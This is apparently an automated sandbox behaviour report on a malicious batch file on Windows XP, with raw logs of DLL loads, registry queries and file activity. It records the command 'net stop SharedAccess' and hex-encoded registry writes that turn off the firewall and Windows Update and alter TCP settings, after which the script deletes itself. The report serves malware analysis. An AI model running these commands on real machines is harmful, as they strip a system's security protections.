C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	340000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	480000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	490000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	410000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	440000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	440000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	980000	57344	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	990000	126976	own pid	execute	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	990000	1208320	own pid	readonly	success or wait	1	4AD031C5
C:\WINDOWS\system32\net.exe	write and read and execute	commit	AC0000	45056	own pid	execute	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	AC0000	45056	own pid	readonly	success or wait	2	4AD031C5

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_USERS\.DEFAULT\Control Panel\Desktop	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_USERS\.DEFAULT\Control Panel\Desktop	EnableExtensions	success or wait	2	4AD04A4F
HKEY_USERS\.DEFAULT\Control Panel\Desktop	DelayedExpansion	object name not found	2	4AD04A88
HKEY_USERS\.DEFAULT\Control Panel\Desktop	DefaultColor	success or wait	2	4AD04AAD
HKEY_USERS\.DEFAULT\Control Panel\Desktop	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\.DEFAULT\Control Panel\Desktop	PathCompletionChar	success or wait	1	4AD04B37
HKEY_USERS\.DEFAULT\Control Panel\Desktop	AutoRun	success or wait	1	4AD04BB8
HKEY_USERS\.DEFAULT\Control Panel\Desktop	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\.DEFAULT\Control Panel\Desktop	PathCompletionChar	object name not found	1	4AD04B37
HKEY_USERS\.DEFAULT\Control Panel\Desktop	AutoRun	object name not found	1	4AD04BB8

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1468	C:\WINDOWS\system32\net.exe	net stop SharedAccess	suspended	success or wait	1	4AD031C5

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
1944	C:\WINDOWS\system32\cmd.exe	970000	13FE10	page read and write	success or wait	1	4AD04578

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1606074840
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1606122893
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1606126945
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1606129801
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1606160652
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1606198526
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1606240382
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1606250988
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1606295947
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1606331188
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1606412954
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1606426172
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1606444644
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1606646757
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1606672306
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1606675207
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1606680649
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1606687097
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1606704889
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1606725824
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1606734146
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1606736029
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1606740517
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1606747075
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1606752775
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1606777231
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1606802373
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1606806629
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1606808175
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1607604094
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1607658454
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1607893482
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1608037406
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1608051151
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1608099345
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1608260874
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1608347369
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: DisableUNCCheck	object name not found	1608488346
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: EnableExtensions	success or wait	1608488643
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: DelayedExpansion	object name not found	1608494580
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: DefaultColor	success or wait	1608494900
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: CompletionChar	success or wait	1608495222
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: PathCompletionChar	success or wait	1608495529
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: AutoRun	success or wait	1608495819
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: DisableUNCCheck	object name not found	1608496185
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: EnableExtensions	success or wait	1608502030
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: DelayedExpansion	object name not found	1608506246
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: DefaultColor	success or wait	1608506520
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: CompletionChar	success or wait	1608506790
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: PathCompletionChar	object name not found	1608519278
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\Desktop Name: AutoRun	object name not found	1608524609
Memory allocated	PID: 1944 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write	success or wait	1608536694
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 980000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1608631343
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 990000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1608637220
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1608649437
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 990000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1608828667
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1608875782
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1608881458
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1608885396
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1608892707
Process created	PID: 1468 Path: C:\WINDOWS\system32\net.exe Cmdline: net stop SharedAccess Createflags: suspended	success or wait	1608917470

Analysis File: wscntfy.exe PID: 532 Parent PID: 1096

Sections

General
Start time:	07:41:16
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\wscntfy.exe
Commandline:	not known
Imagebase:	0x1000000
File size:	13824 bytes
MD5 hash:	F92E1076C42FCD6DB3D72D8CFE9816D5

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	290000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	370000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	7A0000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	7A0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	7A0000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	7A0000	4096	own pid	readonly	success or wait	2
C:\WINDOWS\system32\xpsp2res.dll	query and write and read and execute	image	7C0000	2904064	own pid	read write	image not at base	1
C:\WINDOWS\system32\xpsp2res.dll	query and write and read and execute	image	7C0000	2904064	own pid	read write	conflicting addresses	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1607465718
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1607516498
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1607517793
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1607519344
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1607523889
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1607528190
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1607534197
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1607539407
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1607549628
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1607551090
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1607558634
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1607566685
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1607582970
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 290000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1607652912
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 370000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1607662645
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 370000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1607955440
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1607996992
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 7A0000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1608226780
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 7A0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1608311824
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1608319452
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 7A0000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1608364942
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 7A0000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1608398262
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 7A0000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1608402814
Section loaded	Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 7C0000 Size: 2904064 Protection: read write Mapped to pid: own pid	image not at base	1608493692
Section loaded	Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 7C0000 Size: 2904064 Protection: read write Mapped to pid: own pid	conflicting addresses	1608498560

Analysis File: cmd.exe PID: 1292 Parent PID: 740

Sections

General
Start time:	07:41:17
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	cmd /c c:\sdfeww.bat
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

File Activities:

File opened
File Path	Access	Options	Content overwritten	Completion	Count	Source Address
c:\	read data or list directory and synchronize	directory file and synchronous io non alert and open for backup ident		success or wait	3	4AD02FBF
C:\WINDOWS\TEMP\7684d.reg	read attributes and synchronize and generic read and generic write	synchronous io non alert and non directory file	false	success or wait	22	4AD0E292
C:\WINDOWS\TEMP\7684d.reg	read attributes and delete	non directory file and open for backup ident and open reparse point		success or wait	1	4AD17D07
c:\sdfeww.bat	read attributes and delete	non directory file and open for backup ident and open reparse point		success or wait	1	4AD17D07
c:\sdfeww.bat	read attributes and synchronize and generic read	synchronous io non alert and non directory file	false	wait	1	4AD02F12

File created
File Path	Access	Attributes	Options	Completion	Count	Source Address
C:\WINDOWS\TEMP\7684d.reg	read attributes and synchronize and generic write	normal	synchronous io non alert and non directory file	success or wait	1	4AD02F12

File deleted
File Path	Completion	Count	Source Address
C:\WINDOWS\Temp\7684d.reg	success or wait	1	4AD17D07
C:\sdfeww.bat	success or wait	1	4AD17D07

File written
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\WINDOWS\Temp\7684d.reg	none	10	52 45 47 45 44 49 54 34 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	2	0D 0A	success or wait	7	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	70	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	24	22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 32 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	112	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61 72 61 6D 65 74 65 72 73 5C 46 69 72 65 77 61 6C 6C 50 6F 6C 69 63 79 5C 53 74 61 6E 64 61	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	33	22 45 6E 61 62 6C 65 46 69 72 65 77 61 6C 6C 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	66	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	24	22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 0D 0A	success or wait	2	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	60	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	73	20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C 5D 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	25	22 57 32 4B 4C 70 6B 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	74	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72 73 5D 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	30	22 4D 61 78 46 72 65 65 54 63 62 73 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 37 64 30 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	35	22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	36	22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 0D 0A	success or wait	1	4AD0652F
C:\WINDOWS\Temp\7684d.reg	none	30	22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 0D 0A	success or wait	1	4AD0652F
1292	none	33	54 68 65 20 62 61 74 63 68 20 66 69 6C 65 20 63 61 6E 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E 0D 0A	invalid handle	1	4AD0652F

File read
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\sdfeww.bat	none	8192	40 65 63 68 6F 20 6F 66 66 0D 0A 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E	success or wait	1	4AD069F8
